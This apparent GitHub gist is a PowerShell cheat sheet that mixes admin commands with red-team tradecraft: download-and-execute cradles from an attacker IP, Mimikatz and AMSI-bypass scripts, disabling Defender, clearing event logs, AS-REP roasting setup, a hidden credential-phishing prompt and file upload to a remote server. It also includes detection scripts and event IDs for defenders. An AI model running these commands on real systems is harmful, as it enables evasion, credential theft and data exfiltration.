@aw-junaid
Created January 30, 2026 17:59
PowerShell Environment Commands & Snippets

PowerShell quick reference for help/discovery, services/processes/WMI, PS version, drives, DNS lookups, downloading files, credentials prompts, basic network tests, event log queries, scheduled execution patterns, and PSRemoting basics. Cleaned syntax.


PowerShell basics / discovery

  • Stop-Transcript

    Stops a PowerShell transcript session (if Start-Transcript was enabled).

  • Get-Content file

    Prints file contents (like cat). Use -Tail 50 -Wait to follow logs.

  • Get-Help command -Examples

    Shows usage examples for a cmdlet.

  • Get-Command *string*

    Finds commands whose name matches a wildcard pattern (cmdlets, functions, aliases). The exact form Get-Command string only matches a command literally named "string"; the wildcard form is the useful one.

  • Get-Service

    Lists services.

  • Get-WmiObject -Class Win32_Service

    Lists services via WMI (includes extra fields like PathName, StartName).

  • $PSVersionTable

    Shows PowerShell version and environment details.

  • powershell.exe -Version 2.0

    Starts the Windows PowerShell 2.0 engine (only works if the optional v2 feature and .NET Framework 3.5 are installed). The v2 engine predates AMSI and script block logging, which is why it is used for downgrade attacks and why an engine start with EngineVersion=2.0 (Event ID 400 in the "Windows PowerShell" log) is worth alerting on.


Output/inspection helpers

  • Get-Service | Measure-Object

    Counts objects returned (service count).

  • Get-PSDrive

    Shows PS drives (filesystem, registry hives, env:, cert:, etc.).

  • Get-Process | Select-Object -ExpandProperty Name

    Lists process names only.

  • Get-Help Get-WmiObject -Parameter Credential

    Shows the help entry for one cmdlet's -Credential parameter (Get-Help needs the command name; -Parameter alone returns nothing useful). To find every command that accepts the parameter, use Get-Command -ParameterName Credential.

  • Get-WmiObject -List | Where-Object { $_.Name -match 'network' }

    Finds WMI classes whose name contains "network" (for example Win32_NetworkAdapterConfiguration).


DNS / name lookups

  • [System.Net.Dns]::GetHostEntry("ip_or_host")
    Resolves a hostname to its addresses, or an IP to its PTR name, through the system resolver and returns a host entry object. On Windows 8 / Server 2012 and later, Resolve-DnsName (DnsClient module) does the same and additionally lets you choose the record type and the server to ask.

Downloading files / executing remote content

  • powershell.exe -Command "Invoke-WebRequest 'http://10.10.10.10/nc.exe' -OutFile 'C:\Temp\nc.exe'"

    Downloads a file to disk using Invoke-WebRequest.

  • powershell.exe -Command "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.10.10:8000/p')"

    Downloads a script as text and executes it in memory with Invoke-Expression (IEX), so nothing lands on disk. In-memory does not mean unlogged: with script block logging on, the fetched script's text is written to Event ID 4104, and on Windows 10 / Server 2016 and later AMSI scans it before it runs.

  • Remote PS1 sources

    • https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18...
      
    • https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
      

    Remote script locations that can be fetched with Invoke-WebRequest or WebClient and run with IEX. Anything pulled this way runs with your privileges, so you are trusting both the repository and the transport; Invoke-Mimikatz in particular is signatured by Defender and most AV products, on disk and in memory via AMSI, unless it is modified.


Calling PS1 files

  • . .\script.ps1

    Dot-sources a script (loads functions into the current session).

  • & .\script.ps1

    Executes a script in a child scope.


AMSI / obfuscation

  • Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1

    Loads the module.

  • Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out.ps1

    Generates an obfuscated output script and writes it to out.ps1.

  • https://raw.githubusercontent.com/kmkz/Pentesting/master/AMSI-Bypass.ps1
    

    Remote AMSI bypass script.

  • . .\AMSI-Bypass.ps1
    Invoke-AmsiBypass

    Dot-source the script, then run the function it defines. Public bypasses like this are themselves signatured; the bypass has to get past AMSI before it can disable it, which is where the obfuscation step above comes in.


Disable realtime monitoring (Defender)

  • powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    Turns off Defender real-time monitoring (requires local admin and a Defender install). With Tamper Protection enabled, which is the default on recent Windows 10/11 builds, the call returns without error but has no effect. When it does take effect, Defender records Event ID 5001 ("Real-time protection is disabled") in the Microsoft-Windows-Windows Defender/Operational log.

DirectoryServices searchers (users/computers)

  • $users = New-Object DirectoryServices.DirectorySearcher
    $users.Filter = "(&(objectCategory=person)(objectClass=user))"
    $users.PageSize = 1000
    $users.FindAll()

    Searches the current domain for user objects. Left unset, SearchRoot binds to the root of the domain the host is joined to (assigning "" does the same, just less obviously); set it to a DirectoryEntry such as "LDAP://OU=Staff,DC=corp,DC=local" (placeholder) to scope the search to an OU or another domain. (objectClass=user) alone also matches computer accounts, hence the objectCategory clause. PageSize enables paged results; without it the server stops at 1000 hits.

  • $computers = New-Object DirectoryServices.DirectorySearcher
    $computers.Filter = "(objectClass=computer)"
    $computers.PageSize = 1000
    $computers.FindAll()

    Searches the current domain for computer objects.


AD setting (as written)

  • Set-ADAccountControl -Identity jorden -DoesNotRequirePreAuth $true
    Sets the "Does not require Kerberos preauthentication" flag (UF_DONT_REQUIRE_PREAUTH, userAccountControl bit 0x400000) on the account (requires the RSAT ActiveDirectory module and write access to the account; the parameter is a Boolean, so 1 also works). An account in this state answers an AS-REQ without preauthentication, so its AS-REP can be captured and cracked offline (AS-REP roasting). The change is recorded as Event ID 4738 (a user account was changed) on the DC if user account management auditing is on.
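The two searchers above and the preauthentication flag fit together: the same DirectorySearcher can find every account that already has the flag set. The following is an added example, not code from the gist; it assumes a domain-joined host, and the OU path in the comment is a hypothetical placeholder.

```powershell
# Added example (not part of the original gist): enumerate users and computers with a
# DirectorySearcher, then list accounts with UF_DONT_REQUIRE_PREAUTH set.
# Assumes a domain-joined host; the LDAP path in the comment is a hypothetical placeholder.
function Search-Directory {
    param(
        [Parameter(Mandatory)] [string] $Filter,
        [string[]] $Properties = @('samAccountName', 'distinguishedName'),
        [string] $SearchRoot = $null            # e.g. "LDAP://OU=Staff,DC=corp,DC=local" (hypothetical)
    )
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    if ($SearchRoot) {
        $searcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry($SearchRoot)
    }                                           # otherwise: root of the current domain
    $searcher.Filter   = $Filter
    $searcher.PageSize = 1000                   # paged results; without this you stop at 1000 hits
    foreach ($p in $Properties) { [void] $searcher.PropertiesToLoad.Add($p) }

    foreach ($result in $searcher.FindAll()) {
        $obj = [ordered] @{}
        foreach ($p in $Properties) {
            # Result property names come back lower-cased; join multi-valued attributes with ';'
            $obj[$p] = ($result.Properties[$p.ToLower()] | ForEach-Object { $_ }) -join ';'
        }
        [pscustomobject] $obj
    }
}

# objectCategory=person excludes computer accounts, which are also objectClass=user
$userFilter     = '(&(objectCategory=person)(objectClass=user))'
$computerFilter = '(objectClass=computer)'

# Bitwise-AND matching rule 1.2.840.113556.1.4.803 on userAccountControl:
# 4194304 (0x400000) = UF_DONT_REQUIRE_PREAUTH, the flag Set-ADAccountControl -DoesNotRequirePreAuth sets
$asrepFilter = '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'

$users     = Search-Directory -Filter $userFilter
$computers = Search-Directory -Filter $computerFilter -Properties 'samAccountName', 'operatingSystem', 'dNSHostName'
$noPreauth = Search-Directory -Filter $asrepFilter -Properties 'samAccountName', 'userAccountControl', 'whenChanged'

"{0} users, {1} computers, {2} accounts without Kerberos preauthentication" -f $users.Count, $computers.Count, $noPreauth.Count
$noPreauth | Format-Table -AutoSize
```

The bitwise matching rule is what makes the flag searchable server-side; pulling every user and testing userAccountControl locally works too but is far noisier against a large domain.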

Event logs (query/clear)

  • Get-EventLog -List

    Lists the classic event logs only. Get-WinEvent -ListLog * also covers the ETW-based logs (for example Microsoft-Windows-PowerShell/Operational, where script block logging lands).

  • Clear-EventLog -LogName Application, Security -ComputerName SVR01

    Clears the Application and Security logs on the remote computer SVR01 (requires administrative rights there). Clearing is itself logged: the Security log gets Event ID 1102 ("The audit log was cleared") and the System log gets Event ID 104 when other logs are cleared, so this hides the content but not the fact of clearing.
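Several techniques on this page leave distinct traces: the v2 engine downgrade, download-and-IEX cradles, Defender tampering and log clearing. The following is an added example, not code from the gist, that sweeps a host for those signals with Get-WinEvent. It assumes Windows PowerShell 5.1 on a host with script block logging enabled and an elevated session (the Security log needs it); the event IDs are the standard Windows ones (400 engine start, 4104 script block text, 1102 Security log cleared, 104 other log cleared).

```powershell
# Added example (not part of the original gist): local sweep for PowerShell-related signals.
# Assumes Windows PowerShell 5.1, script block logging enabled, elevated session.
function Get-SuspiciousPowerShellEvents {
    param(
        [int] $Hours = 24,
        [string] $ComputerName = $env:COMPUTERNAME
    )
    $since = (Get-Date).AddHours(-$Hours)
    $out   = New-Object System.Collections.Generic.List[object]

    # Get-WinEvent throws "No events were found" instead of returning nothing; normalise that to an empty list
    function Query($hash) {
        try { Get-WinEvent -ComputerName $ComputerName -FilterHashtable $hash -ErrorAction Stop }
        catch { @() }
    }

    # 1. Engine downgrade: the v2 engine has no AMSI and no script block logging
    Query @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = $since } |
        Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
        ForEach-Object { $out.Add([pscustomobject] @{ Time = $_.TimeCreated; Signal = 'PSv2 engine start'; Detail = 'EngineVersion=2.0' }) }

    # 2. Download cradles and AMSI/Defender tampering in logged script blocks
    $pattern = 'DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression|AmsiUtils|amsiInitFailed|DisableRealtimeMonitoring'
    Query @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since } |
        ForEach-Object {
            $text = [string] $_.Properties[2].Value      # property index 2 of a 4104 event is ScriptBlockText
            if ($text -match $pattern) {
                $snippet = if ($text.Length -gt 120) { $text.Substring(0, 120) + '...' } else { $text }
                $out.Add([pscustomobject] @{ Time = $_.TimeCreated; Signal = 'Script block match'; Detail = $snippet })
            }
        }

    # 3. Log clearing (Security log: 1102; other logs: 104 in the System log)
    Query @{ LogName = 'Security'; Id = 1102; StartTime = $since } |
        ForEach-Object { $out.Add([pscustomobject] @{ Time = $_.TimeCreated; Signal = 'Security log cleared'; Detail = ($_.Message -split "`n")[0] }) }
    Query @{ LogName = 'System'; Id = 104; StartTime = $since } |
        ForEach-Object { $out.Add([pscustomobject] @{ Time = $_.TimeCreated; Signal = 'Log cleared'; Detail = ($_.Message -split "`n")[0] }) }

    $out | Sort-Object Time
}

Get-SuspiciousPowerShellEvents -Hours 48 | Format-Table -AutoSize -Wrap
```

The regular expression is deliberately loose; it exists to show where the evidence lives, and in a real deployment you would tune it against your own baseline of legitimate admin scripts.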


Export OS version to CSV

  • Get-WmiObject -Class Win32_OperatingSystem |
      Select-Object * |
      Export-Csv C:\os.csv -NoTypeInformation
    Exports every property of the OS object (version, build, install date, last boot time, etc.) to a CSV file.

List running services

  • Get-Service | Where-Object { $_.Status -eq "Running" }
    Shows only running services.

Persistent PSDrive mapping (share)

  • New-PSDrive -Persist -PSProvider FileSystem -Root \\1.1.1.1\tools -Name i
    Maps a persistent drive i: to the SMB share.

Files written after a specific date

  • Get-ChildItem -Path C:\ -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue |
      Where-Object { $_.LastWriteTime -gt "2012-08-20" }
    Finds .log files modified after the given date.

Download file from HTTP to destination

  • (New-Object System.Net.WebClient).DownloadFile("url","dest")
    Downloads a URL directly to a local path.

TCP port connections (simple scanner)

  • $ports = @(80,443,445)
    $ip = "x.x.x.x"
    $timeoutMs = 1000
    
    foreach ($port in $ports) {
      $socket = New-Object System.Net.Sockets.TcpClient
      try {
        # BeginConnect + WaitOne gives a bounded timeout; the blocking constructor can hang ~20 s on a filtered port
        $async = $socket.BeginConnect($ip, $port, $null, $null)
        if (-not $async.AsyncWaitHandle.WaitOne($timeoutMs)) {
          "${ip}:${port} - Filtered (timeout)"
        } else {
          $socket.EndConnect($async)   # throws if the connection was refused
          "${ip}:${port} - Open"
        }
      } catch {
        "${ip}:${port} - Closed"
      } finally {
        $socket.Close()
      }
    }
    Attempts to connect to each port and reports open, closed or filtered. Note the ${ip}:${port} form: "$ip:$port" is a parse error in PowerShell because "$ip:" is read as a drive-qualified variable name. On Windows 8.1 / Server 2012 R2 and later, Test-NetConnection -ComputerName x.x.x.x -Port 445 does a single-port check without any code.

Ping with 500ms timeout

  • $ping = New-Object System.Net.NetworkInformation.Ping
    $ping.Send("ip",500)
    Sends one ICMP echo request with a 500 ms timeout and returns a PingReply whose Status tells you Success, TimedOut, etc.

Credential prompt window

  • powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "($Host.UI.PromptForCredential('title','message','user','domain')).GetNetworkCredential().Password"
    Starts PowerShell with its console hidden and shows the standard Windows credential dialog with the given title, message and pre-filled user; the PSCredential it returns exposes the typed password in plaintext through GetNetworkCredential(). Run it from cmd.exe as shown (from an existing PowerShell prompt the outer shell would expand $Host first). As two separate lines, the first just opens an idle hidden shell and the prompt never appears.

Run an EXE every 4 hours in a date/time window (as given, corrected)

  • powershell.exe -Command "do { if ((Get-Date -Format yyyyMMdd-HHmm) -match '201308(0[8-9]|1[0-1])-(0[8-9]|1[0-7])[0-5][0-9]') { Start-Process -WindowStyle Hidden 'C:\Temp\my.exe'; Start-Sleep -Seconds 14400 } else { Start-Sleep -Seconds 60 } } while ($true)"
    Loops forever; when the current timestamp matches the window (8 to 11 August 2013, 08:00 to 17:59) it runs my.exe and sleeps 4 hours, otherwise it polls once a minute. Without the else branch the loop spins at full CPU whenever the window does not match.

Start PowerShell as another user (credential object)

  • $pw = ConvertTo-SecureString -String "PASSWORD" -AsPlainText -Force
    $pp = New-Object System.Management.Automation.PSCredential("DOMAIN\user", $pw)
    
    Start-Process powershell -Credential $pp -ArgumentList '-NoProfile -Command &{Start-Process file.exe -Verb RunAs}'
    Builds a PSCredential from a plaintext password and launches a new PowerShell process under that identity; the inner Start-Process -Verb RunAs then requests elevation, because -Credential and -Verb belong to different parameter sets and cannot be combined in one Start-Process call. The password sits in plaintext in the script and in the command history.

Download with iwr (Invoke-WebRequest)

  • powershell iwr -UseBasicParsing http://192.168.2.x/SharpHound.exe -OutFile .\SharpHound.exe
    Downloads SharpHound.exe to the current directory. -UseBasicParsing avoids the Internet Explorer DOM dependency in Windows PowerShell 5.1 (it is the only mode in PowerShell 7).

Email sender

  • powershell.exe Send-MailMessage -To "email" -From "email" -Subject "Subject" -Attachments "attachment file path" -Body "Body" -SmtpServer TargetEmailServerIP
    Sends an email with an attachment through the specified SMTP server (the text after powershell.exe is taken as the -Command argument). Without -UseSsl the message and any -Credential go over the wire in plaintext; the cmdlet is marked obsolete in PowerShell 7 but still works.

Enable PSRemoting remotely (scheduled)

  • net time \\ip

    Reads the remote host's clock, so the scheduled times below are expressed in its time.

  • at \\ip time "PowerShell -Command ""Enable-PSRemoting -Force"""

    Schedules Enable-PSRemoting on the remote host. at.exe was removed in Windows 8 / Server 2012; on anything newer use schtasks /S ip /Create ... (or another remote execution primitive such as WMI Win32_Process Create) to run the same command. Enable-PSRemoting already starts WinRM and sets it to start automatically, and it refuses to open the firewall rule while any network interface is on the Public profile unless -SkipNetworkProfileCheck is added.

  • at \\ip time+1 "PowerShell -Command ""Set-Item wsman:\localhost\client\trustedhosts '*'"""

    Schedules setting TrustedHosts on the remote host. TrustedHosts is a client-side setting: it only affects connections that host initiates. To connect to the host by IP address from your own machine, set TrustedHosts on your machine instead.

  • at \\ip time+2 "PowerShell -Command ""Restart-Service WinRM"""

    Schedules a WinRM restart (redundant after Enable-PSRemoting, harmless otherwise).

  • Enter-PSSession -ComputerName ip -Credential username

    Enters an interactive remote session, prompting for the user's password. Connecting by IP address rather than hostname means no Kerberos SPN, so authentication falls back to NTLM, which is exactly the case that requires the client-side TrustedHosts entry.
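The same procedure, done without at.exe and without guessing a schedule, as an added example that is not part of the gist: run Enable-PSRemoting on the target through the WMI Win32_Process.Create method, add the target to the local TrustedHosts list, then wait for WinRM to answer before opening the session. It assumes administrative rights on the target over RPC (port 135 plus dynamic ports); $Target and the account name are hypothetical placeholders.

```powershell
# Added example (not part of the original gist): enable PSRemoting on a remote host via WMI,
# fix TrustedHosts on the client side, and wait for WinRM instead of scheduling blind.
# $Target and the CORP\admin account are hypothetical placeholders.
param(
    [string] $Target = '10.10.10.20',
    [pscredential] $Cred = (Get-Credential 'CORP\admin'),
    [int] $TimeoutSeconds = 120
)

# 1. Run Enable-PSRemoting on the target. -SkipNetworkProfileCheck stops it failing when a NIC is on the Public profile.
$remoteCommand = 'powershell.exe -NoProfile -Command "Enable-PSRemoting -Force -SkipNetworkProfileCheck"'
$create = Invoke-WmiMethod -ComputerName $Target -Credential $Cred -Class Win32_Process -Name Create -ArgumentList $remoteCommand
if ($create.ReturnValue -ne 0) {
    throw "Win32_Process.Create failed on $Target with return value $($create.ReturnValue)"
}
"Spawned PID $($create.ProcessId) on $Target"

# 2. TrustedHosts is a client-side list; we are the client, so it goes here, not on the target.
$current = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
if ($current -notmatch "(^|,)$([regex]::Escape($Target))($|,)") {
    $new = if ([string]::IsNullOrEmpty($current)) { $Target } else { "$current,$Target" }
    Set-Item WSMan:\localhost\Client\TrustedHosts -Value $new -Force
}

# 3. Poll WinRM on the target until it answers or the deadline passes
$deadline = (Get-Date).AddSeconds($TimeoutSeconds)
$ready = $false
do {
    try {
        Test-WSMan -ComputerName $Target -Credential $Cred -Authentication Negotiate -ErrorAction Stop | Out-Null
        $ready = $true
    } catch {
        Start-Sleep -Seconds 5
    }
} until ($ready -or (Get-Date) -gt $deadline)

if (-not $ready) { throw "WinRM on $Target did not answer within $TimeoutSeconds seconds" }

# 4. Interactive session; Invoke-Command -ScriptBlock works the same way for non-interactive use
Enter-PSSession -ComputerName $Target -Credential $Cred -Authentication Negotiate
```

Appending a single IP to TrustedHosts, rather than '*', keeps NTLM fallback limited to the host you mean; a wildcard lets any host you later mistype receive your credentials.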


Hostname and IP list from MicrosoftDNS WMI

  • Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "DomainName='DOMAIN'" |
      Select-Object TextRepresentation
    Queries DNS records from a domain controller’s Microsoft DNS provider and prints textual record data.

Download from PowerShell from a specific HTTPS path (ignore cert)

  • powershell.exe -NoProfile -NonInteractive -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $source='https://YOUR_SPECIFIED_IP/file.zip'; $destination='C:\master.zip'; $http = New-Object System.Net.WebClient; $http.DownloadFile($source,$destination)"
    Downloads a file from HTTPS with certificate validation switched off. The {$true} callback accepts any certificate for every TLS connection made by that process from then on, so anyone on the path can serve you a substitute file; it is convenient for a self-signed lab server and nothing more.

Send a file via HTTP POST (UploadFile)

  • powershell.exe -NoProfile -NonInteractive -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server='http://YOUR_SPECIFIED_IP/folder'; $filepath='C:\master.zip'; $http = New-Object System.Net.WebClient; $http.UploadFile($server,$filepath)"
    Uploads a local file to a web server endpoint as a multipart/form-data POST. The endpoint has to accept such a POST (a plain directory listing will not); the certificate callback is irrelevant here since the URL is http://.
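The middle ground between full validation and {$true} is to accept exactly one known certificate. The following is an added example, not code from the gist: the callback still accepts any certificate that chains to a trusted CA, and otherwise accepts only the certificate whose SHA-1 thumbprint you already copied from your server. It assumes Windows PowerShell 5.1, where WebClient honours ServicePointManager (in PowerShell 7 use Invoke-WebRequest -SkipCertificateCheck instead); $Url, $Destination and $ExpectedThumbprint are hypothetical placeholders.

```powershell
# Added example (not part of the original gist): pin one certificate instead of disabling validation.
# Assumes Windows PowerShell 5.1. $Url, $Destination and $ExpectedThumbprint are placeholders.
param(
    [string] $Url = 'https://10.10.10.10/file.zip',
    [string] $Destination = 'C:\Temp\file.zip',
    [string] $ExpectedThumbprint = '0000000000000000000000000000000000000000'   # 40 hex chars from your server's cert
)

$pinned = $ExpectedThumbprint.ToUpperInvariant() -replace '[^0-9A-F]', ''

# GetNewClosure() captures $pinned so the callback can see it when .NET invokes it
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {
    param($sender, $certificate, $chain, $sslPolicyErrors)
    # Valid chain to a trusted root: accept as usual
    if ($sslPolicyErrors -eq [System.Net.Security.SslPolicyErrors]::None) { return $true }
    # Otherwise accept only the pinned certificate
    $thumb = $certificate.GetCertHashString().ToUpperInvariant()
    if ($thumb -eq $pinned) { return $true }
    Write-Warning "Rejected certificate $thumb (errors: $sslPolicyErrors)"
    return $false
}.GetNewClosure()

# Windows PowerShell 5.1 may otherwise offer only SSL3/TLS1.0 to a modern server
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12

try {
    $client = New-Object System.Net.WebClient
    $client.DownloadFile($Url, $Destination)
    "Downloaded $Url to $Destination ($((Get-Item $Destination).Length) bytes)"
} finally {
    # Restore default validation so later TLS calls in this session are not affected
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $null
    if ($client) { $client.Dispose() }
}
```

To get the thumbprint for a lab server, open the certificate in the browser or run certutil against the .cer; if it ever changes you want the warning rather than a silent download.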

Useful additions for PowerShell environment

  • Get-ExecutionPolicy -List

    Shows execution policy scopes.

  • Set-ExecutionPolicy -Scope Process Bypass -Force

    Sets Bypass for the current process only (nothing is written to the registry). Execution policy is a guard against accidentally running scripts, not a security boundary; powershell.exe -ExecutionPolicy Bypass, or piping the script into -Command, gets the same result without changing anything.

  • Get-ChildItem Env:

    Lists environment variables.

  • Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run

    Lists the machine-wide Run key, the most common registry autostart location. The per-user key under HKCU:, the RunOnce siblings and the WOW6432Node view on 64-bit Windows hold the same kind of entries and should be checked together.
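Checking one Run key by hand misses five others. The following is an added example, not code from the gist, that reads the Run/RunOnce keys in both hives (plus the 32-bit view) and flags entries that launch a script host from a user-writable folder or embed a download cradle. The flagging rules are a heuristic of mine, not a Windows feature, and need tuning for your environment.

```powershell
# Added example (not part of the original gist): sweep the common registry autostart keys
# and flag entries matching a few heuristics (script hosts, user-writable paths, cradles).
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Heuristics (my own, not authoritative): user-writable folders, script hosts / LOLBins, encoded or downloaded payloads
$suspicious = @(
    '(?i)\\AppData\\|\\Temp\\|\\Users\\Public\\|\\ProgramData\\',
    '(?i)\b(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|cmd)(\.exe)?\b',
    '(?i)\s-e(c|nc|ncodedcommand)?\s|FromBase64String|DownloadString|\bIEX\b|Invoke-Expression|https?://'
)

function Get-RunKeyEntries {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        # Get-ItemProperty adds PSPath/PSParentPath/... bookkeeping properties; skip those
        foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
            $cmd  = [string] $p.Value
            $hits = foreach ($rx in $suspicious) { if ($cmd -match $rx) { $rx } }
            [pscustomobject] @{
                Key        = $key
                Name       = $p.Name
                Command    = $cmd
                Suspicious = [bool] $hits
            }
        }
    }
}

$entries = @(Get-RunKeyEntries)
$entries | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
"{0} entries, {1} flagged" -f $entries.Count, @($entries | Where-Object Suspicious).Count
```

Registry Run keys are only one autostart mechanism; scheduled tasks, services and WMI event subscriptions deserve the same treatment, and Sysinternals Autoruns covers all of them if you can bring a binary onto the box.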
